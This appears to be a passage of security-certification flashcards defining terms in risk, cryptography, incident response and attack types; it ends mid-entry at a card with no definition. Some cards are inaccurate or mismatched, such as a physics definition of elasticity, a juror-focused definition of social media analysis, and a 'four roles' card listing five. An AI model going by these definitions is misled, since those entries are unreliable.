Occur when the security of a code segment depends upon the sequence of events occurring within the system
Three main methods used to exchange secret symmetric keys
Offline distribution, public key encryption, Diffie-Hellman
Virtual machine
One or more logical machines created within one physical machine; the apparent machine that the operating system presents to the user, achieved by hiding the complexities of the hardware behind layers of operating system software.
Continuous validation
Ongoing approvals of code.
7 common weak network configurations
Open permissions Unsecure root accounts Errors Weak encryption Unsecure protocols Default settings Open ports and services
10 sources of threat intelligence
Open-Source Intelligence (OSINT) Closed/Proprietary Vulnerability databases Public/private information-sharing centers Dark web Indicators of Compromise (IoC) Automated Indicator Sharing (ASI) Predictive analysis Threat maps File/code repositories
Examples of common platforms/vendor-specific guides that benchmarks are written about
Operating systems, web servers, application servers, network infrastructure devices
Mission essential functions
Operations that are core to the success of the business. (Revenue generating applications, billing applications, etc.); refers to functions that need to be immediately functional at an alternate site until normal operations can be restored.
How is asymmetric key encryption used?
Opposite and related keys must be used in tandem to encrypt and decrypt. If the public key encrypts a message, then only the corresponding private key can decrypt it, and vice versa
Data in processing
Organization of data for the purpose of producing desired information; involves recording, classifying, sorting, summarizing, calculating, disseminating and storing data.
Vulnerability scan output
Output that provides information as to the systems that are running, any additional services that are listening on the network, and what the known vulnerabilities are against each of those.
Firmware OTA updates
Over-the-air updates for mobile device firmware that keep them up to date. These are typically downloaded to the device from the internet and applied to update the device.
Types of information that organizations should store in their inventory
PII, PHI, financial information, government information
Potentially Unwanted Programs
PUP; Programs that may not be wanted by the user but are not as dangerous as other types of malware
Service Level Agreement (SLA)
Part of a service contract where the service expectations are formally defined; written contracts that specify the conditions of service that will be provided by the vendor and the remedies available to the customer if the vendor fails to meet the SLA.
Third-party updates
Patch updates for application and utility software.
Credential policies should be established for what groups/personnel?
Personnel (employees), third-party contractors, devices, service accounts, administrator/root accounts
Vishing
Phishing attacks committed using telephone calls or VoIP systems.
Smishing
Phishing attacks committed using text messages (SMS).
Retention policies
Policies that identify how long data is retained and how it will be disposed of; an important component for incident responders since it may determine how long the organization keeps incident data, how long logs will be available, and what data is likely to have been retained and thus may have been exposed if a system or data store is compromised or exposed.
Conditional access
Policies that, at their simplest, can be defined as if-then statements: if a user wants to access a resource, then they must complete an action.
Bollard
Posts or other obstacles that prevent vehicles from moving through an area
Six steps in the incident response cycle
Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned
Six security control types
Preventive controls Detective controls Corrective controls Deterrent controls Physical controls Compensating controls
Principle of Scarcity
Principle (of social engineering) that makes something look more desirable because it may be the last one available
Principle of Trust
Principle (of social engineering) that relies on a connection with the individual they are targeting
Principle of Urgency
Principle (of social engineering) that relies on creating a feeling that the action must be taken quickly due to some reason or reasons
Technical controls
Procedural mechanisms that enforce confidentiality, integrity, and availability in the digital space. Examples include firewall rules, access control lists, intrusion prevention systems, and encryption.
Managerial controls
Procedural mechanisms that focus on the mechanics of the risk management process; examples include periodic risk assessments, security planning exercises, and the incorporation of security into the organization's change management, service acquisition, and project management practices.
Operational controls
Procedural mechanisms that include the processes that we put in place to manage technology in a secure manner. Thee include user access reviews, log monitoring, and vulnerability management.
Encryption
Process of converting readable data into unreadable characters to prevent unauthorized access.
Pseudo-anonymization
Process of replacing PII with simulated identifiers. Techniques include de-identification and data obfuscation.
Open source software
Program code made publicly available for free; it can be copied, distributed, or changed without stringent copyright protections.
Trojans
Programs that look useful, but actually cause damage to your computer
Public cloud
Promotes massive, global, and industrywide applications offered to the general public
General Data Protection Regulation (GDPR)
Proposed set of regulations adopted by the European Union to protect EU residents from clandestine tracking and unauthorized personal data usage.
Nonrepudiation
Provides assurance to the recipient that the message was originated by the sender and not someone masquerading as the sender
Least privilege
Providing only the minimum amount of privileges necessary to perform a job or function; a principle that users be granted the privilege for some activity only if there is a justifiable need to grant this authorization.
Fog computing
Provisioning processing resource between the network edge of IoT devices and the data center to reduce latency.
Six information classification levels commonly used in businesses
Public, private, sensitive, confidential, critical, proprietary
Two analysis methodologies for risk assessments
Quantitative risk assessment and qualitative risk assessment
Remote Access Trojan
RAT; a type of malware that allows covert surveillance, a backdoor for administrative control and unfettered and unauthorized remote access to a victim's machine.
Two most common asymmetric cryptography algorithms
RSA and Elliptic curve
Wideband
Radio system that support higher data rate transmissions (faster communication)
Three examples of embedded systems
Raspberry Pi, FPGA, Arduino
Seven stages of the Cyber Kill chain
Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on Objective
4 types of penetration testing teams
Red, Blue, White, Purple
Offsite storage
Refers to an environmentally-controlled facility away from the computer/data center where paper copies or backup media are securely kept; can be owned by a company or managed by a third party service, like Iron Mountain.
Employee Onboarding
Refers to the tasks associated with hiring a new employee
Type 1 SOC report
Report that includes management's assertion and the auditor's opinion on the organization's effective design of controls.
Four biggest organizational consequences of privacy and data breaches
Reputational damage, identity theft, fines, IP theft
Host-based intrusion prevention system
Restricts unauthorized services and applications from running on the host machine; blocks known intrusion signatures
Three nonpersistent response controls
Revert to known state, last known-good configuration, live boot media
Five ways to harden host/application security solutions
Review open ports and services, registry, disk encryption, OS updates/boot security, patch management
Four types of risk management strategies
Risk acceptance, risk avoidance, risk transference, risk mitigation
Risk severity formula
Risk severity = Likehood x Impact
Purchasing cybersecurity insurance falls under which risk management strategy?
Risk transference
Multiparty risks
Risks that impact more than one organization; example is a power outage to a city block, because it affects all of the buildings on that block, or the compromise of an SaaS provider's database, which affects many different customers of the SaaS provider.
External risks
Risks that originate from a source outside the organization; an extremely broad category, including cybersecurity adversaries, malicious code, and natural disasters, among many other types.
Internal risks
Risks that originate from within the organization; includes malicious insiders, mistakes made by authorized users, equipment failures, and similar risks.
Robot sentries
Robots used to patrol the perimeter of a secure area.
Regulatory requirements
Rules or laws that regulate conduct and that the enterprise must obey to become compliant.
Two most common types of hash functions
SHA and MD5
Three categories of SOC assessment
SOC 1 engagements, SOC 2 engagements, SOC 3 engagements
The two most common ways of accessing monitoring data
SPAN or port tap
4 examples of protocol-based network DDoS attacks
SYN floods, Ping of Death, Smurf attack, Christmas Tree attack
Credentialed Scan
Scan in which the scanning computer has an account on the computer being scanned that allows the scanner to do a more thorough check looking for problems that can not be seen from the network.
Non-credentialed scan
Scan that might be used in a black box or blind test when you have no knowledge of any system accounts; scans from the outside with no access or authentication.
Intrusive scan
Scans that combine verification of actual vulnerabilities by trying to exploit the vulnerability.
Application scan
Searches for known exploits within a piece of software.
Web application scan
Searches for known exploits within web applications.
War driving
Searching for wireless signals from an automobile or on foot using a portable computing device.
Gamification
Selective use of game design and game mechanics to drive employee engagement in non-gaming business scenarios.
Examples of IoT devices
Sensors, building and facility automation devices, wearables, smart devices (like appliances, cars)
Six common components of a SIEM dashboard
Sensors, sensitivity, trends, alerts, correlation/analysis, rules
Community cloud
Serves a specific community with common business models, security requirements, and compliance considerations; example would be health care systems
Public/private information-sharing centers
Sharing of data and intelligence whether public or private with other companies and people who "need to know". Typically consists of organizations with extensive resources and many times in the same market (such as fintech) and are working to help each other out and make sure everyone stays safe -- even though they're competitors, they have the same goal of protecting each other from threat actors and threats.
Syslog
Short for system logging protocol; a standard for message logging. It allows separation of the software that generates messages, the system that stores them, and the software that reports and analyzes them; used to send system log or event messages to a specific server, called a syslog server. It is primarily used to collect various device logs from several different machines in a central location for monitoring and review.
Four attributes that NIDS/NIPS examines to determine whether network traffic is safe or not
Signature-based, Heuristic/behavior, Anomaly, Inline/Passive
Checksums
Simple method used in symmetric key cryptography to ensured data integrity; a data transmission control that uses a hash of a file to verify accuracy
Six factors to consider before installing/configuring wireless networks
Site surveys, heat maps, Wi-Fi analyzers, channel overlaps, WAP placement, controller and access point security
Two types of VPNs
Site-to-Site and Remote Access.
Tokens
Small electronic devices that change user passwords automatically
Influence campaigns
Social engineering attacks that attempt to guide, adjust, or change public opinion, often waged by nation-states against their real or perceived foreign enemies
Password crackers
Software programs used to identify an unknown or forgotten password
Network access control
Software that controls access to the network by not allowing computers to access network resources unless they meet certain predefined security requirements.
Proprietary software
Software that has been developed by a company and has restrictions on its use, copying, and modification.
Antivirus
Software that is specifically designed to detect viruses and protect a computer and files from harm
Anti-malware
Software that prevents attacks by a wide range of destructive, malicious, or intrusive programs
Voice recognition technology
Software that recognizes the words being said by the person dictating and converts speech to text; differs from speech recognition because voice recognition "learns" the voice of the dictator and is therefore more accurate.
sn1per
Software utility designed for penetration testing reporting and evidence gathering that can also run automated test suites.
Data Loss Prevention
Software which works like antivirus programs in reverse, blocking outgoing messages that contain key words or phrases associated with intellectual property or other sensitive data the organization wants to protect
Data loss prevention
Software which works like antivirus programs in reverse, blocking outgoing messages that contain key words or phrases associated with intellectual property or other sensitive data the organization wants to protect
Host-based intrusion detection system
Software-based application that runs on a local host computer that can detect an attack as it occurs
Broadcast storm prevention
Solutions for a particular issue that include avoiding physical cable loops among switches, using spanning tree protocol (STP) on switches, and implementing port security.
Three factors of MFA
Something you know, something you have, something you are
Four attributes of MFA
Somewhere you are, something you can do, something you exhibit, someone you know
SPIM
Spam over Instant Messaging; Spam that is delivered through instant messaging.
Role-based training
Specialized training that is customized to the specific role that an employee holds in the organization.
One of the most common type of fire suppression systems
Sprinklers
Playbooks
Step-by-step guides intended to help IR teams take the right actions in a given scenario; a set of procedures detailing the steps to take when an event has been detected.
Walk-throughs
Step-by-step reviews of procedures or program logic to find incorrect logic, errors, omissions, or other problems; this exercise can help ensure that team members know their roles as well as the IR process, and that the tools, access, and other items needed to respond are available and accessible to them.
RAID 5
Striping data with parity; Data is striped across drives, with one drive used for parity (checksum) of the data. Parity is spread across drives as well as data
RAID 0
Striping data; data is spread across all drives in the array
The two primary types of nonmathematical cryptography (or ciphering methods)
Substitution and transposition
DHCP snooping
Switch process that monitors DHCP traffic, filtering out DHCP messages from untrusted sources. Typically used to block attacks that use a rogue DHCP server.
The two main types of cryptosystems that enforce confidentiality
Symmetric and asymmetric
Fake telemetry
Synthetic network traffic that resembles genuine communications, delivered at an appropriate volume to make honeynets and honeypots look real.
2 specific vendor management risks
System integration Lack of vendor support
Common types of SIEM log files
System logs, Application logs, Security logs, Vulnerability scan output, Network logs
RFID
System of tags which contain data that can be read from a distance using radio waves.
Automated Indicator Sharing (AIS)
System that enables the sharing of attack indicators, at machine speed, between the US government and the private sector as soon as the threat is verified
Asymmetric cryptosystem
System that uses individual combinations of public and private keys for each user of the system
Symmetric cryptosystem
System where encryption key and decryption key are the same; use a shared secret key available to all users of the cryptosystem
Generator
Systems that are used to provide power for longer outages
Single point of failure
Systems, devices, or other components that, if they fail, would cause an outage; a component or entity in a system which, if it no longer functions, would adversely affect the entire system.
Examples of authentication technologies
TOTP, HMAC-based OTP, SMS, token key, static codes, authentication applications, push notifications, phone call
Three major types of exercises that IRTs use to prepare
Tabletop exercises, Walk-throughs, simulations
Common choices for backup media
Tape, disk, optical media, flash media
Three categories of security control
Technical controls, managerial controls, operational controls
Adversarial artificial intelligence (AI)
Techniques such as machine learning used to solve a variety of problems and challenges used by an adversary.
Privileged Access Management (PAM)
Technologies that help organizations provide secured privileged access to critical assets and meet compliance requirements by securing, managing and monitoring privileged accounts and access.
Closed-circuit television
Television that displays what the camera is seeing on a screen
State actors
Term used to describe Nation-States when they interact on the world stage implementing their foreign policies.
Elasticity
The ability of a material to bounce back after being disturbed
How digital forensics plays a role in both strategic intelligence and counterintelligence efforts
The ability to analyze adversary actions and technology, including components and behaviors of APT tools and processes, has become a key tool in the arsenal for national defense and intelligence groups. At the same time, forensic capabilities can be used for intelligence operations when systems and devices are recovered or acquired, allowing forensic practitioners to recover data and provide it for analysis by intelligence organizations.
Nonpersistence
The ability to have systems or services that are spun up and shut down as needed
(Certificate) verification
The act of checking the CA's digital signature using the CA's public key; performed when you receive a digital certificate from someone with whom you want to communicate.
Dumpster diving
The act of digging through trash receptacles to find information that can be useful in an attack.
Isolation
The act of moving a system into a protected space or network where it can be kept away from other systems.
Pivoting
The act of moving to a new location in a network and begins the attack process over again, performing scans to see visible machines that weren't before.
(Certificate) revocation
The act of revoking a certificate (making it invalid)
Four strengths of asymmetric key cryptography
The addition of new users requires the generation of only one public-private key pair; users can be removed far more easily; key regeneration is required only when a user's private key is compromised; can provide integrity, authentication, and nonrepudiation; key distribution is a simple process; no preexisting communication link needs to exist
Annualized Loss Expectancy (ALE)
The amount of damage expected from a risk each year; calculated by multiplying the SLE and the ARO.
Recovery Point Objective (RPO)
The amount of data that the organization can tolerate losing during an outage.
Single Loss Expectancy (SLE)
The amount of financial damage expected each time a risk materializes; calculated by multiplying the AV by the EF.
Recovery Time Objective (RTO)
The amount of time that the organization can tolerate a system being down before it is repaired.
Network vulnerability scanner
The application of vulnerability scanning to network devices to search for vulnerabilities at the network level.
Steganography
The art of using cryptographic techniques to embed secret messages within another file; can be done with audio, video, or images
Site risk assessment
The assessment of all risks and hazards that could happen at a particular site.
Extensible Authentication Protocol-TLS
The authentication protocol most commonly deployed on WPA2-Enterprise networks to enable the use of X.509 digital certificates for authentication; provides for certificate-based and mutual authentication of the client and the network.
Mean Time to Repair (MTTR)
The average amount of time to restore a system to its normal operating state after a failure.
SIEM Alerts
The capability (quality) of the SIEM dashboard to analyze log files and post alerts when certain information appears in the log files; the primary communication in the SIEM that visualizes raw data, log info, and identifies security events.
SIEM Trends
The capability (quality) of the SIEM dashboard to analyze patterns in hardware breakdown and performance issues, so that they can predict when maintenance may need to happen in the future. There are separate categories of events, such as application, system, and security events.
Scalability
The capacity for the system to change in size and scale to meet new demands
Why might a certificate be revoked?
The certificate was compromised (owner accidentally gave away the private key) The certificate was erroneously issues (CA mistakenly issued a certificate without proper verification) The details of the certificate changed The security association changed (subject is no longer employed by the organization sponsoring the certificate)
Services integration and Management (SIAM)
The connection of infrastructure and software elements to provide specific services to a business entity; many different service providers working together in a single-business IT organization
Site resiliency
The considerations that can be connected to the idea of restoration sites and their availability
HTML5
The current version of the HTML standard, which can be used as an alternative to Adobe Flash media
Information life cycle
The cycle of gathering, recording, processing, storing, sharing, transmitting, retrieving, and deleting information.
Blue Team
The defensive team in a penetration test or incident response exercise.
Disaster Recovery Planning (DRP)
The discipline of developing plans to recover operations as quickly as possible in the face of a disaster.
Data controller
The entities who determine the reasons for processing personal information and direct the methods of processing that data; a term used primarily in European law and it serves as a substitute for the term data owner to avoid a presumption that anyone who collects data has an ownership interest in that data.
Production environment
The environment for the actual system operation. It includes hardware and software configurations, system utilities, and communications resources. Also called the operational environment.
Cryptocurrency
The first major application of the blockchain
HTTP headers
The first printing line of output in a web application that tells your web browser how to interpret the data that follows it
Reconnaissance
The gathering of information about a target, whether that is an organization, individual, or something else
Key management
The generation, storage, distribution, deletion, archiving, and application of keys in accordance with a security policy.
Redundancy
The inclusion of extra components so that a system can continue to work even if individual components fail, for example by having more than one path between any two connected devices in a network.
Shadow IT
The information systems and solutions built and deployed by departments other than the information systems department. In many cases, the information systems department may not even be aware of these efforts.
Cuckoo
The leading open source automated malware analysis system.
Discretionary Access Control (DAC)
The least restrictive access control model in which the owner has total control over any object that he/she owns along with the programs that are associated with those objects.
Attestation
The lending of credibility to assertions made by a third party
Risk appetite
The level of risk that an organization is willing to accept as a cost of doing business.
False acceptance rate
The measure of the likelihood that the access system will wrongly accept an access attempt. i.e. will allow an unauthorized user access.
Data sanitization
The method used to repeatedly delete and overwrite any traces or bits of sensitive data that may remain on a device after data wiping has been done.
Asset value (AV)
The monetary value of a company-owned product, usually determined using the cost to acquire an asset, replace an asset, or the depreciated cost of an asset.
RSA
The most common asymmetric cryptography algorithm.
Digital encoding rules
The most common binary format of digital certificates. These are normally stored in files with .DER, .CRT, or .CER extensions.
Domain validation certificates
The most simplest and common certificate issued by a CA; for this, the CA simply verifies that the certificate subject has control of the domain name
Annualized Rate of Occurrence (ARO)
The number of times the risk is expected each year; expressed in a decimal format.
Password Authentication Protocol (PAP)
The oldest and most basic form of authentication and also the least safe because it sends all passwords in cleartext.
Tor
The onion router; a mechanism for anonymously routing traffic across the Internet using encryption and a set of relay nodes
Runbooks
The operational procedures guides that organizations use to perform actions; simplify the decision process for common operations that may support incident response, and they can help guide and build automation for tasks like communications, malware removal, or scanning.
Revert to known state
The option of restoring a device to a previous secure condition; also possible by using snapshots in a virtualization environment or other tools that track changes
Footprinting
The organized research and investigation of Internet addresses owned or controlled by a target organization.
Root certificate
The original digital certificate issued by a Certification Authority.
Inherent risk
The original level of risk that exists before implementing any controls.
Domain reputation
The overall "health" of your branded domain as interpreted by mailbox providers.
False rejection rate
The percentage of times that the system fails to recognize an authorized person and rejects that person as unauthorized.
Data Protection Officer
The person in charge of privacy/data protection in the EU under GDPR; GDPR requires that every data controller designates someone in this position and grant that individual the autonomy to carry out their responsibilities without under oversight.
Recovery
The phase of the IRC produces a restoration to normal - the heart of this phase. It may mean bringing systems or services back online or other actions that are part of a return to operations. This phase requires that eradication be successful, but it also involves implementing fixes to ensure that whatever security weakness, flaw, or action that allowed the incident to occur has been remediated to prevent the event from immediately reoccurring.
Lessons learned
The phase of the IRC that ensures that organizations improve and do not make the same mistakes again. It may be as simple as patching systems or as complex as needing to redesign permission structures and operational procedures. These are then used to inform the preparation process, and the cycle continues.
Eradication
The phase of the IRC that involves removing the artifacts associated with the incident. In many cases, it will involve rebuilding or restoring systems and applications from backups rather than simply removing tools from a system since proving that a system has been fully cleaned can be very difficult.
Identification
The phase of the IRC that involves reviewing events to identify incidents. You must pay attention to IoCs, use log analysis and security monitoring capabilities, and have a comprehensive awareness and reporting program for your staff.
Preparation
The phase of the IRC where you build the tools, processes, and procedures to respond to an incident. Includes building and training an Incident Response team, and acquiring, configuring, and operating security tools and incident response capabilities.
Containment
The phase of the IRC where, once an incident has been identified, the IRT needs to contain it to prevent further issues or damage. This can be challenging and may not be complete if elements of the incident are not identified in the initial identification efforts.
Provenance
The place or source of origin of any data; where an image or drive came from and what happened with it.
Crossover error rate
The point where the false acceptance rate (FAR) crosses over with the false rejection rate (FRR). A lower CER indicates a more accurate biometric system.
Dark web
The portion of the internet that is intentionally hidden from search engines, uses masked IP addresses, and is accessible only with a special web browser.
Risk register
The primary tool that risk management professionals use to track risks facing the organization; a document in which the results of risk analysis and risk response planning are recorded.
Data minimization
The principle that organizations only collect the smallest possible amount of information necessary to meet their business requirements; in data protection, the principle that only necessary and sufficient personal information can be collected and processed for the stated purpose.
Lateral Movement
The process by which an attacker is able to move from one part of a computing environment to another.
Anonymization
The process in which individually identifiable data is altered in such a way that it no longer can be related back to a given individual.
Normalization
The process of applying rules to a database design to ensure that information is divided into the appropriate tables.
Code signing
The process of assigning a certificate to code. The certificate includes a digital signature and validates the code; process that uses digital signatures to provide an assurance that the software code has not been modified after it was submitted by the developer
Risk awareness
The process of being consistently informed about the risks in one's organization or specific department; involves evaluating assets, vulnerabilities, and threats in order to clearly define an organization's risk level.
Pulping
The process of breaking paper documents into wood pulp, removing ink; materials can be recycled
Boot attestation
The process of determining that the boot process is valid; report of boot state integrity data that is signed by a tamper-proof TPM key and reported to a network server.
Full Disk Encryption (FDE)
The process of encrypting all the data on the hard disk drive used to boot a computer, including the computer's operating system, and permitting access to the data only after successful authentication with the full disk encryption product
Privilege escalation
The process of gaining elevated rights and permissions. Malware typically uses a variety of techniques to obtain this.
Infrastructure as code
The process of managing and provisioning computer data centers through machine-readable definition files rather than physical hardware configuration or interactive configuration tools.
Threat hunting
The process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.
Degaussing
The process of removing or rearranging the magnetic field of a disk in order to render the data unrecoverable; magnetically wipes data from tapes and traditional magnetic media like hard drives.
Tokenization
The process of replacing sensitive data with unique identification symbols (tokens) that retain all the essential information about the data without compromising its security.
static code analysis
The process of reviewing source code while it is in a static state; i.e., it is not executing.
Social media analysis
The process of scouring the Internet to gather personal information and create a fuller profile of each potential juror's attitudes, interests, and experiences
Rooting/Jailbreaking
The process of taking root access on a mobile device.
Carrier unlocking
The process of unlocking a mobile phone from a specific cellular provider.
Ciphering
The process of using a cipher to do that type of scrambling to a message
E-discovery
The processes by which electronic data that might be used as legal evidence are requested, secured, and searched; this is often used for public records, Freedom of Information Act requests, and investigations.
Admissibility
The quality of the evidence in a case that allows it to be presented to the jury; evidence typically falls under this category if it is offered to prove the facts of a case and it does not violate the law; criteria includes relevance, reliability, whether it was obtained legally, authentic, etc.
Broadcast storm
The result of one or more devices sending a nonstop flurry of broadcast frames on the network.
protocol analyzer output
The returned data from hardware or software that captures packets to decode and analyze their contents.
Control risk
The risk that arises from the potential that a lack of internal controls within the organization will cause a material misstatement in the organization's financial reports.
Residual risk
The risk that remains after an organization implements controls designed to mitigate, avoid, and/or transfer the inherent risk.
Non-repudiation
The security principle of providing proof that a transaction occurred between identified parties. Repudiation occurs when one party in a transaction denies that the transaction took place.
Domain name system (DNS)
The service that translates URLs to IP addresses.
Key length
The size of a key, usually measured in bits, that a cryptographic algorithm uses in ciphering or deciphering protected information.
Public key infrastructure
The system for issuing pairs of public and private keys and corresponding digital certificates
Employee Offboarding
The tasks associated when an employee is released from the enterprise.
Incident response team
The team that manages and executes the IR plan by detecting, evaluating, and responding to incidents.
Hotspot
The term used when a mobile device provides internet to wireless devices by using Wi-Fi
Shared and Generic Accounts/Credentials
The type of account that allows multiple users to utilize the same account; typically prohibited by proper account management in order to maintain identification, authentication, authorization, and accounting
Guest accounts
The type of account that is useful if you want to grant someone limited access to a computer or network without creating a new account.
Service accounts
The type of account used to provide privileged access used by system services and core applications
Bluesnarfing
The unauthorized access of information from a wireless device through a Bluetooth connection.
Typosquatting
The unethical practice of registering domain names very similar to those of high-volume sites in hopes of receiving traffic from users seeking the high-volume site who mistakenly enter an incorrect URL in their browsers.
Message digest
The unique output value derived from the content of a message; a small representation of a larger message. Message digests are used to ensure the authentication and integrity of information, not the confidentiality.
Trust model
The use of a trusted third party to verify the trustworthiness of a digital certificate.
Predictive analysis
The use of data warehouses and complex algorithms to forecast future events, based on historical trends and calculated probabilities
Multipath Solutions
The use of multiple network paths to ensure that a severed cable or failed device will not cause a loss of connectivity.
Threat vectors
The way in which an attacker poses a threat
How are common languages such as Python, Perl, and Bash leveraged as part of an attack process?
These languages can be used to create persistent remote access using bind or reverse shells, as well as a multitude of other useful exploit tools.
Why should shared and generic accounts be avoided when applicable?
They are difficult to troubleshoot or audit in the even of a breach, as multiple users use them. Each user should have their own non-admin account.
Why is it important to place datacenters and other facilities a significant distance away from one another?
This distance prevents most common natural disasters from disabling both (or more) datacenters. Additionally, it helps ensure that facilities will not be impacted by issues with the power grid, network connectivity, and other similar issues.
Application deny/block listing
This lists applications or files that are not allowed on a system and will prevent them from being installed or copied to the system.
Application allow listing
This lists the applications and files that are allowed to be on a system and prevents anything that is not on the list from being installed or run; a security option that prohibits unauthorized software from executing.
The meaning of a wildcard included in a certificate name
This means that the certificate is good for subdomains of the registered domain as well (only one level, though). It is indicated by an asterisk.
Geographic dispersal
This process ensures that single disaster, attack, or failure cannot disable or destroy them.
Criminal syndicates
Threat actors who have moved from traditional criminal activities to more rewarding and less risky online attacks.
What is the purpose of hash functions?
To take a potentially long message and generate a unique output value derived from the content of the message.
Configuration review
To verify the operating condition and the effectiveness of its security configuration and rule sets.
Mobile Device Management (MDM) (or UEM)
Tools that allow a device to be managed remotely.
Software development kit
Tools that allow the creation of products or add-ons for a specific operating system or other computing platform
IP scanners
Tools that scan through a range of IP address and report levels of responsiveness.
Exploitation frameworks
Tools used to store information about security vulnerabilities. They are often used by penetration testers (and attackers) to detect and exploit software.
Four major information classification categories of the US government
Top secret, secret, confidential, unclassified
Hashing
Transforming plaintext of any length into a short code called a hash
Tethering
Transforms a smartphone or Internet-capable tablet into a portable communications device that shares its Internet access with other computers and devices wirelessly; the act of using a cellular-network-connected mobile device as a mobile hotspot.
Two types of IPSec modes
Transport and tunnel
Two types of SOC reports
Type 1 and type 2
2 examples of volume-based network DDoS attacks
UDP floods and ICMP floods
(Managed) PDUs
Units that are used to provide intelligent power management and remote control of power delivered inside server racks and other environments.
Drone
Unmanned aerial vehicle that can be used to capture images of a site, to deliver a payload, or even to take action like cutting a wire or blocking a camera; aren't a critical concern for most, but are increasingly an element that needs to be considered.
Spam
Unsolicited, unwanted commercial email messages
Background checks
Used by employers to verify the accuracy of the information you provided on your resume or job application. Items checked include: employment verification, education background/degrees, references, credit history, medical records, driving record, court records, and criminal records.
Bridge Protocol Data Unit (BPDU)
Used by switches to share information with other switches that are participating in the Spanning-Tree Protocol
Legacy platforms
Used to describe systems that are no longer being marketed or supported
Software Defined Networking (SDN)
Using a central control program separate from network devices to manage the flow of data on a network
Forensic technique used to recover data from drives and devices
Using a recovery tool or manually, review the drive, find files based on headers or metadata, and recover the file(s) and file fragments. It is also still possible to recover fragments of files in cases where a file has been partially overwritten.
Sandboxing
Using a virtual machine to run a suspicious program to determine if it is malware.
Why is it important to implement a diversity of technologies when building resilience into an infrastructure?
Using different vendors, cryptographic solutions, platforms, and controls can make it more difficult for a single attack or failure to have system- or organization- wide impacts.
scanless
Utility that runs port scans through third-party websites to evade detection; a port scanner that cannot be traced back.
Auto-update
Utility which automatically updates systems software as new releases become available.
4 third-party risks
Vendor Management Supply Chain Outsourced code development Data storage
9 research sources for threat intelligence
Vendor websites Vulnerability feeds Conferences Academic Journals Request for Comments (RFC) Local industry groups Social media Threat feeds Adversary tactics, techniques, and procedures (TTP)
Attributes listed on every digital certificate
Version of X.509 to which the certificate conforms Serial number (from the certificate creator) Signature algorithm identifier Issuer name Validity period Common name Subject Alternative Name (optional) Subject's public key
CPU cache volatility level
Very volatile - registers are constantly changing as processing occurs
Ten use cases for using secure protocols (hint: think of what each secure protocol does)
Voice and video Time synchronization Email and web File transfer Directory services Remote access Domain name resolution Routing and switching Network address allocation Subscription services
2 major categories of Network DDoS attacks
Volume-based and protocol-based
Four cryptographic protocols
WPA2, WPA3, CCMP, SAE
What is the biggest (or one of the biggest) security concerns with IoT devices?
Weak default settings
Four major types of sprinklers
Wet, dry, pre-action, deluge
Hashing collision
When a hash function produces the same value for two different methods; the existence of this typically leads to the deprecation of a hashing algorithm
False negative
When a vulnerability scan fails to report a true threat.
False positive
When a vulnerability scan reports a threat that is not really one.
Tailgating
When an unauthorized individual enters a restricted-access building by following an authorized user.
Dual-supply
When two independent power supply units, either capable of handling the load, are used; ensures that a power supply failure won't disable a server
Bluetooth
Wireless PAN technology that transmits signals over short distances between cell phones, computers, and other devices
Wi-Fi
Wireless local area network that uses radio signals to transmit data.
Intermediate CA
a CA that issue certificates to child CAs and is issued certificates by a root CA, creating a certificate chain
Cloud reference architecture
a document published by NIST that offers a high-level taxonomy for cloud services; a vision for how the elements of the architecture fit together.
Extranet
a network configuration that allows select personnel outside of an organization to access internal information systems
Port tap
a purpose-built device that passively makes a copy of network data but does not alter the data. Once you install it, you are done. No programming is required.
Artificial Intelligence
a subdiscipline of computer science that attempts to simulate human thinking; focuses on accomplishing "smart" tasks by combining ML, deep learning, and related techniques
Screened subnet
also known as DMZ; used to contain systems that are accessible by the outside world or some other less secure population; commonly uses two firewalls; one resides between the public network and DMZ and the other resides between the DMZ and the private network; can be logical or physical segments of a network
Simple Network Management Protocol version 3
an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior
Jurisdiction
an area of authority or control; the right to administer justice; concerns may extend beyond which law covers the overall organization. Ex: Cloud providers often have sites around the world, and data replication and other services elements mean that your data or services may be stored or used in a similarly broad set of locations. This "area" may claim rights to access that data with a search warrant or other legal instrument.
Digital signature
an encrypted code that a person, website, or organization attaches to an electronic message to verify the identity of the message sender
Authorized hackers
an ethical hacker with good intentions and permission to hack (white hat)
Four data roles/responsibilities that should be assigned to a person/people in any organization
data owner, data controller, data processor, data custodian/steward, data protection officer
Three ways to prove integrity of forensic data
hashing, checksum, provenance
Examples of file manipulation commands
head, tail, cat, grep, chmod, logger
Examples of ephemeral data
process table, kernel statistics, the system's ARP cache
Cipher
the generic term for a technique (or algorithm) that performs encryption; a method used to scramble or obfuscate characters to hide their value
NIC teaming
the process of grouping together two or more physical NICs into one single logical NIC, which can be used for network fault tolerance and increased bandwidth through load balancing
(Certificate) enrollment
"The process of requesting, receiving, and installing a certificate."; the process of proving your identity to the CA in some manner in order to obtain a digital certificate
Worms
Independent computer programs that copy themselves from one computer to other computers over a network
Driver manipulation
A software attack where the attacker rewrites or replaces the legitimate device driver or application programming interface (API) to enable malicious activity to be performed
Jamming
A DoS attack against wireless networks. It transmits noise on the same frequency used by a wireless network.
Birthday attack
A cryptographic attack that searches for any two digests (collisions) that are the same.
Downgrade attack
A cryptographic attack; an attack in which the system is forced to abandon the current higher security mode of operation and fall back to implementing an older and less secure mode.
Supply-chain attacks
A cyber-attack that seeks to damage an organization by targeting less-secure elements in the supply chain.
Refactoring
A driver manipulation method. Developers rewrite the code without changing the driver's behavior.
Shimming
A driver manipulation method. It uses additional code to modify the behavior of a driver.
Watering Hole Attack
A malicious attack that is directed toward a small group of specific individuals who visit the same website.
Pass the hash
A password attack that captures and uses the hash of a password. It attempts to log on as the user with the hash and is commonly associated with the Microsoft NTLM protocol.
Dictionary attack
A password attack that creates encrypted versions of common dictionary words and compares them against those in a stolen password file.
Whaling
A phishing attack targeted to senior business executives, government leaders, and other high-level positions.
Pharming
A phishing attack that reroutes requests for legitimate websites to false websites.
Spear phishing
A phishing attack that targets only specific users.
Malicious flash drive
A physical device that contains malicious PDFs, files, etc that could be harmful to your computer; older systems would automatically upload from this physical device without user consent
Resource exhaustion
A situation in which a hardware device with limited resources (CPU, memory, file system storage, etc.) is exploited by an attacker who intentionally tries to consume more resources than intended.
Cross-site request forgery (XSRF)
An attack that exploits the trust a website has in a user's browser in an attempt to transmit unauthorized commands to the website.
Dynamic Link Library (DLL) injection
